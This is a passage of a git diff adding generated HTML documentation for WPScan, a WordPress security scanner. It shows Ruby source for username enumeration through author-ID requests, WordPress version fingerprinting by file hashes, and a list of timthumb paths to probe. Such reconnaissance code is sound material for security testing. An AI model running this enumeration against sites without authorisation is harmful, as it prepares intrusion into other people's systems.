timthumb.php lib/timthumb.php inc/timthumb.php includes/timthumb.php
scripts/timthumb.php tools/timthumb.php functions/timthumb.php
}</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">file</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">targets</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpItem</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>],
<span class="ruby-value">:path</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-node">&quot;themes/#{theme_name}/#{file}&quot;</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>],
<span class="ruby-value">:name</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">theme_name</span>,
<span class="ruby-value">:vulns_file</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;XX&quot;</span>,
<span class="ruby-value">:type</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;timthumbs&quot;</span>,
<span class="ruby-value">:wp_plugins_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_plugins_dir</span>]
)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">targets</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- targets_url_from_theme-source -->
</div>
</div><!-- targets_url_from_theme-method -->
</div><!-- protected-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

488
doc/WpUsernames.html Normal file
View File

@@ -0,0 +1,488 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: WpUsernames</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/wp_usernames_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/wp_usernames.rb">lib/wpscan/modules/wp_usernames.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-author_url">#author_url</a></li>
<li><a href="#method-i-extract_nickname_from_body">#extract_nickname_from_body</a></li>
<li><a href="#method-i-get_nickname_from_response">#get_nickname_from_response</a></li>
<li><a href="#method-i-get_nickname_from_url">#get_nickname_from_url</a></li>
<li><a href="#method-i-remove_junk_from_nickname">#remove_junk_from_nickname</a></li>
<li><a href="#method-i-usernames">#usernames</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">WpUsernames</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="author_url-method" class="method-detail ">
<a name="method-i-author_url"></a>
<div class="method-heading">
<span class="method-name">author_url</span><span
class="method-args">(author_id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="author_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_usernames.rb, line 102</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">author_url</span>(<span class="ruby-identifier">author_id</span>)
<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-node">&quot;?author=#{author_id}&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- author_url-source -->
</div>
</div><!-- author_url-method -->
<div id="extract_nickname_from_body-method" class="method-detail ">
<a name="method-i-extract_nickname_from_body"></a>
<div class="method-heading">
<span class="method-name">extract_nickname_from_body</span><span
class="method-args">(body)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="extract_nickname_from_body-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_usernames.rb, line 77</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">extract_nickname_from_body</span>(<span class="ruby-identifier">body</span>)
<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{&lt;title&gt;([^&lt;]*)&lt;/title&gt;}</span>, <span class="ruby-value">1</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- extract_nickname_from_body-source -->
</div>
</div><!-- extract_nickname_from_body-method -->
<div id="get_nickname_from_response-method" class="method-detail ">
<a name="method-i-get_nickname_from_response"></a>
<div class="method-heading">
<span class="method-name">get_nickname_from_response</span><span
class="method-args">(resp)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="get_nickname_from_response-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_usernames.rb, line 69</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_nickname_from_response</span>(<span class="ruby-identifier">resp</span>)
<span class="ruby-identifier">nickname</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span>
<span class="ruby-identifier">nickname</span> = <span class="ruby-identifier">extract_nickname_from_body</span>(<span class="ruby-identifier">resp</span>.<span class="ruby-identifier">body</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">nickname</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_nickname_from_response-source -->
</div>
</div><!-- get_nickname_from_response-method -->
<div id="get_nickname_from_url-method" class="method-detail ">
<a name="method-i-get_nickname_from_url"></a>
<div class="method-heading">
<span class="method-name">get_nickname_from_url</span><span
class="method-args">(url)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="get_nickname_from_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_usernames.rb, line 60</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_nickname_from_url</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-identifier">resp</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">url</span>, {<span class="ruby-value">:follow_location</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>, <span class="ruby-value">:max_redirects</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">2</span>})
<span class="ruby-identifier">nickname</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span>
<span class="ruby-identifier">nickname</span> = <span class="ruby-identifier">extract_nickname_from_body</span>(<span class="ruby-identifier">resp</span>.<span class="ruby-identifier">body</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">nickname</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_nickname_from_url-source -->
</div>
</div><!-- get_nickname_from_url-method -->
<div id="remove_junk_from_nickname-method" class="method-detail ">
<a name="method-i-remove_junk_from_nickname"></a>
<div class="method-heading">
<span class="method-name">remove_junk_from_nickname</span><span
class="method-args">(usernames)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="remove_junk_from_nickname-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_usernames.rb, line 81</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">remove_junk_from_nickname</span>(<span class="ruby-identifier">usernames</span>)
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">usernames</span>.<span class="ruby-identifier">kind_of?</span> <span class="ruby-constant">Array</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;Need an array as input&quot;</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">nicknames</span> = []
<span class="ruby-identifier">usernames</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">u</span><span class="ruby-operator">|</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">u</span>.<span class="ruby-identifier">kind_of?</span> <span class="ruby-constant">WpUser</span>
<span class="ruby-identifier">raise</span>(<span class="ruby-string">&quot;Items must be of type WpUser&quot;</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">nickname</span> = <span class="ruby-identifier">u</span>.<span class="ruby-identifier">nickname</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">nickname</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;empty&quot;</span>
<span class="ruby-identifier">nicknames</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-identifier">nickname</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">junk</span> = <span class="ruby-identifier">get_equal_string_end</span>(<span class="ruby-identifier">nicknames</span>)
<span class="ruby-identifier">usernames</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">u</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">u</span>.<span class="ruby-identifier">nickname</span> = <span class="ruby-identifier">u</span>.<span class="ruby-identifier">nickname</span>.<span class="ruby-identifier">sub</span>(<span class="ruby-node">/#{Regexp.escape(junk)}$/</span>, <span class="ruby-string">&quot;&quot;</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">usernames</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- remove_junk_from_nickname-source -->
</div>
</div><!-- remove_junk_from_nickname-method -->
<div id="usernames-method" class="method-detail ">
<a name="method-i-usernames"></a>
<div class="method-heading">
<span class="method-name">usernames</span><span
class="method-args">(options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Enumerate wordpress usernames by using Veronica Valeross technique: <a
href="http://seclists.org/fulldisclosure/2011/May/493">seclists.org/fulldisclosure/2011/May/493</a></p>
<p>Available options :</p>
<pre>:range - default : 1..10</pre>
<p>returns an array of <a href="WpUser.html">WpUser</a> (can be empty)</p>
<div class="method-source-code" id="usernames-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_usernames.rb, line 28</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">usernames</span>(<span class="ruby-identifier">options</span> = {})
<span class="ruby-identifier">range</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:range</span>] <span class="ruby-operator">||</span> (<span class="ruby-value">1</span><span class="ruby-operator">..</span><span class="ruby-value">10</span>)
<span class="ruby-identifier">browser</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>
<span class="ruby-identifier">usernames</span> = []
<span class="ruby-identifier">range</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">author_id</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">url</span> = <span class="ruby-identifier">author_url</span>(<span class="ruby-identifier">author_id</span>)
<span class="ruby-identifier">response</span> = <span class="ruby-identifier">browser</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-identifier">username</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">nickname</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">301</span> <span class="ruby-comment"># username in location?</span>
<span class="ruby-identifier">username</span> = <span class="ruby-identifier">response</span>.<span class="ruby-identifier">headers_hash</span>[<span class="ruby-string">'location'</span>][<span class="ruby-regexp">%{/author/([^/]+)/}</span>, <span class="ruby-value">1</span>]
<span class="ruby-comment"># Get the real name from the redirect site</span>
<span class="ruby-identifier">nickname</span> = <span class="ruby-identifier">get_nickname_from_url</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span> <span class="ruby-comment"># username in body?</span>
<span class="ruby-identifier">username</span> = <span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{posts by (.*) feed}</span>, <span class="ruby-value">1</span>]
<span class="ruby-identifier">nickname</span> = <span class="ruby-identifier">get_nickname_from_response</span>(<span class="ruby-identifier">response</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">username</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">nil</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">nickname</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">nil</span>
<span class="ruby-identifier">usernames</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-constant">WpUser</span>.<span class="ruby-identifier">new</span>(<span class="ruby-identifier">username</span>, <span class="ruby-identifier">author_id</span>, <span class="ruby-identifier">nickname</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">usernames</span> = <span class="ruby-identifier">remove_junk_from_nickname</span>(<span class="ruby-identifier">usernames</span>)
<span class="ruby-comment"># clean the array, remove nils and possible duplicates</span>
<span class="ruby-identifier">usernames</span>.<span class="ruby-identifier">flatten!</span>
<span class="ruby-identifier">usernames</span>.<span class="ruby-identifier">compact!</span>
<span class="ruby-identifier">usernames</span>.<span class="ruby-identifier">uniq</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- usernames-source -->
</div>
</div><!-- usernames-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

658
doc/WpVersion.html Normal file
View File

@@ -0,0 +1,658 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpVersion</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_version_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_version.rb">lib/wpscan/wp_version.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Vulnerable.html">Vulnerable</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-find">::find</a></li>
<li><a href="#method-c-find_from_advanced_fingerprinting">::find_from_advanced_fingerprinting</a></li>
<li><a href="#method-c-find_from_links_opml">::find_from_links_opml</a></li>
<li><a href="#method-c-find_from_meta_generator">::find_from_meta_generator</a></li>
<li><a href="#method-c-find_from_readme">::find_from_readme</a></li>
<li><a href="#method-c-find_from_rss_generator">::find_from_rss_generator</a></li>
<li><a href="#method-c-find_from_sitemap_generator">::find_from_sitemap_generator</a></li>
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-c-version_pattern">::version_pattern</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpVersion</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="discovery_method-attribute-method" class="method-detail">
<a name="discovery_method"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">discovery_method</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="number-attribute-method" class="method-detail">
<a name="number"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">number</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="find-method" class="method-detail ">
<a name="method-c-find"></a>
<div class="method-heading">
<span class="method-name">find</span><span
class="method-args">(target_uri, wp_content_dir)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Will use all method self.find_from_* to try to detect the version Once the
version is found, it will return a <a href="WpVersion.html">WpVersion</a>
object The method_name will be without find_from_ and _ will be replace
by (IE meta generator, rss generator etc) If the version is not
found, nil is returned</p>
<p>The order in which the find_from_* methods are is important, they will be
called in the same order (<a
href="WpVersion.html#method-c-find_from_meta_generator">find_from_meta_generator</a>,
<a
href="WpVersion.html#method-c-find_from_rss_generator">find_from_rss_generator</a>
etc)</p>
<div class="method-source-code" id="find-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 39</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find</span>(<span class="ruby-identifier">target_uri</span>, <span class="ruby-identifier">wp_content_dir</span>)
<span class="ruby-identifier">options</span> = {
<span class="ruby-value">:base_url</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">target_uri</span>,
<span class="ruby-value">:wp_content_dir</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">wp_content_dir</span>
}
<span class="ruby-keyword">self</span>.<span class="ruby-identifier">methods</span>.<span class="ruby-identifier">grep</span>(<span class="ruby-regexp">/find_from_/</span>).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">method_to_call</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">version</span> = <span class="ruby-keyword">self</span>.<span class="ruby-identifier">send</span>(<span class="ruby-identifier">method_to_call</span>, <span class="ruby-identifier">options</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">version</span>
<span class="ruby-keyword">return</span> <span class="ruby-identifier">new</span>(<span class="ruby-identifier">version</span>, <span class="ruby-value">:discovery_method</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">method_to_call</span>[<span class="ruby-regexp">%{find_from_(.*)}</span>, <span class="ruby-value">1</span>].<span class="ruby-identifier">gsub</span>(<span class="ruby-string">'_'</span>, <span class="ruby-string">' '</span>))
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">nil</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- find-source -->
</div>
</div><!-- find-method -->
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(number, options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 25</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">number</span>, <span class="ruby-identifier">options</span> = {})
<span class="ruby-ivar">@number</span> = <span class="ruby-identifier">number</span>
<span class="ruby-ivar">@discovery_method</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:discovery_method</span>]
<span class="ruby-ivar">@vulns_file</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:vulns_file</span>] <span class="ruby-operator">||</span> <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">'/wp_vulns.xml'</span>
<span class="ruby-ivar">@vulns_xpath</span> = <span class="ruby-node">&quot;//wordpress[@version='#{@number}']/vulnerability&quot;</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="protected-class-method-details" class="method-section section">
<h3 class="section-header">Protected Class Methods</h3>
<div id="find_from_advanced_fingerprinting-method" class="method-detail ">
<a name="method-c-find_from_advanced_fingerprinting"></a>
<div class="method-heading">
<span class="method-name">find_from_advanced_fingerprinting</span><span
class="method-args">(options)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Uses data/wp_versions.xml to try to identify a wordpress version.</p>
<p>It does this by using client side file hashing with a scoring system.</p>
<p>The scoring system is a number representing the uniqueness of a client side
file across all versions of wordpress.</p>
<p>Example:</p>
<p>Score - Hash - File - Versions</p>
<pre> 1 - 3e63c08553696a1dedb24b22ef6783c3 - /wp-content/themes/twentyeleven/style.css - 3.2.1
2 - 15fc925fd39bb496871e842b2a754c76 - /wp-includes/js/wp-lists.js - 2.6,2.5.1
3 - 3f03bce84d1d2a169b4bf4d8a0126e38 - /wp-includes/js/autosave.js - 2.9.2,2.9.1,2.9
/!\ Warning : this method might return false positive if the file used for fingerprinting is part of a theme (they can be updated)</pre>
<div class="method-source-code" id="find_from_advanced_fingerprinting-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_version.rb, line 94</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">find_from_advanced_fingerprinting</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-identifier">target_uri</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:base_url</span>]
<span class="ruby-comment"># needed for rpsec tests</span>
<span class="ruby-identifier">version_xml</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:version_xml</span>] <span class="ruby-operator">||</span> <span class="ruby-constant">DATA_DIR</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot;/wp_versions.xml&quot;</span>
<span class="ruby-identifier">xml</span> = <span class="ruby-constant">Nokogiri</span><span class="ruby-operator">::</span><span class="ruby-constant">XML</span>(<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-identifier">version_xml</span>)) <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">config</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">config</span>.<span class="ruby-identifier">noblanks</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">xml</span>.<span class="ruby-identifier">xpath</span>(<span class="ruby-string">&quot;//file&quot;</span>).<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">node</span><span class="ruby-operator">|</span>
